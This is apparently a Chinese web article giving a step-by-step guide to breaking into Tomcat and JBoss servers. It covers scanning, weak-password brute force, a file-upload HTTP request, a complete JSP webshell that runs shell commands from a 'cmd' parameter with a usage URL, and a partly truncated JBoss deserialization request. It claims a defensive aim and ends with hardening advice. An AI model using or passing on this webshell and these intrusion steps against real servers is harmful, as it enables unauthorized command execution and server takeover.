本文将介绍伪黑客常用的tomcat和Jboss入侵方法,帮助读者更好地了解网络安全和防范黑客攻击。以下是详细攻略:
伪黑客的成功的秘密:tomcat入侵和Jboss入侵的方法介绍(图)
本文将介绍伪黑客常用的tomcat和Jboss入侵方法,帮助读者更好地了解网络安全和防范黑客攻击。以下是详细攻略:
一、tomcat入侵
1.漏洞扫描
1.1 先扫描端口,确认tomcat是否开启。
1.2 对tomcat的目录进行爆破,找出存在漏洞的页面。
2.弱口令破解
尝试使用常见的弱口令字典,进行暴力破解。
3.文件上传漏洞
尝试上传jsp一句话木马,写入webshell。
示例1:使用工具hackbar模拟文件上传漏洞:
POST /examples/jsp/upload.jsp HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------1234567890
Content-Length: 395
-----------------------------1234567890
Content-Disposition: form-data; name="fileType"
1
-----------------------------1234567890
Content-Disposition: form-data; name="filename"
web3shell.jsp
-----------------------------1234567890
Content-Disposition: form-data; name="savePath"
/
-----------------------------1234567890
Content-Disposition: form-data; name="file"; filename="web3shell.jsp"
Content-Type: application/octet-stream
<% out.println("Hello World!");%>
-----------------------------1234567890--
4.命令执行漏洞
尝试利用命令执行漏洞,获取web服务器的shell权限。
示例2:使用命令执行漏洞获取web服务器shell权限:
http://localhost:8080/manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=67145B74E8C299B7975268F4FA054C6C
在上传的jsp页面里加上一段代码:
<%
if(request.getParameter("cmd")!=null){
try {
String cmd = request.getParameter("cmd");
String[] cmds = new String[] {"/bin/sh", "-c", cmd};
Process p = Runtime.getRuntime().exec(cmds);
BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));
String line;
while((line=br.readLine())!=null){
out.println(line+"<br>");
}
br.close();
} catch (Exception e){
e.printStackTrace();
}
}
%>
然后就可以通过以下url执行系统命令:
http://localhost:8080/upload/shell.jsp?cmd=whoami
二、Jboss入侵
1.漏洞扫描
1.1 先扫描端口,确认jboss是否开启。
1.2 对jboss的目录进行爆破,找出存在漏洞的页面。
2.弱口令破解
尝试使用常见的弱口令字典,进行暴力破解。
3.反序列化漏洞
利用Jboss的反序列化漏洞,写入webshell获取shell权限。
示例3:使用序列化漏洞获取web服务器shell权限:
POST /invoker/JMSServlet HTTP/1.1
Host: localhost:8080
Content-Length: 535
Connection: close
Content-Type: application/x-java-serialized-object
class=org.jboss.invocation.MarshalledInvocation&object=
rO0ABXNyABpqYXZhLmxhbmcu...
在序列化的内容中添加一句话木马即可,如:
POST /invoker/JMSServlet HTTP/1.1
Host: localhost:8080
Content-Length: 431
Connection: close
Content-Type: application/x-java-serialized-object
class=org.jboss.invocation.MarshalledInvocation&object=...
结论
tomcat和Jboss作为常见的服务器程序,存在许多安全漏洞。黑客可以通过漏洞扫描、弱口令破解、文件上传漏洞、命令执行漏洞以及反序列化漏洞等方法攻击服务器,获取系统权限。建议系统管理员加强服务器安全配置,定期检查漏洞,提高系统安全性。
本文标题为:伪黑客的成功的秘密:tomcat入侵和Jboss入侵的方法介绍(图)
基础教程推荐
- Java躲不过设计模式的坑之代理模式详解 2023-05-14
- Java easyexcel使用教程之导出篇 2022-12-07
- springboot使用小工具之Lombok、devtools、Spring Initailizr详解 2023-06-30
- java递归设置层级菜单的实现 2023-03-22
- springboot整合mybatis plus与druid详情 2023-06-02
- Java模拟微信来电提醒示例 2023-03-11
- SpringBoot Http远程调用的方法 2023-04-12
- java – 使用jdbc和Kerberos委派连接到SAP HANA数据库 2023-11-03
- Java利用遗传算法求解最短路径问题 2022-12-08
- Mybatis入门指南之实现对数据库增删改查 2023-06-30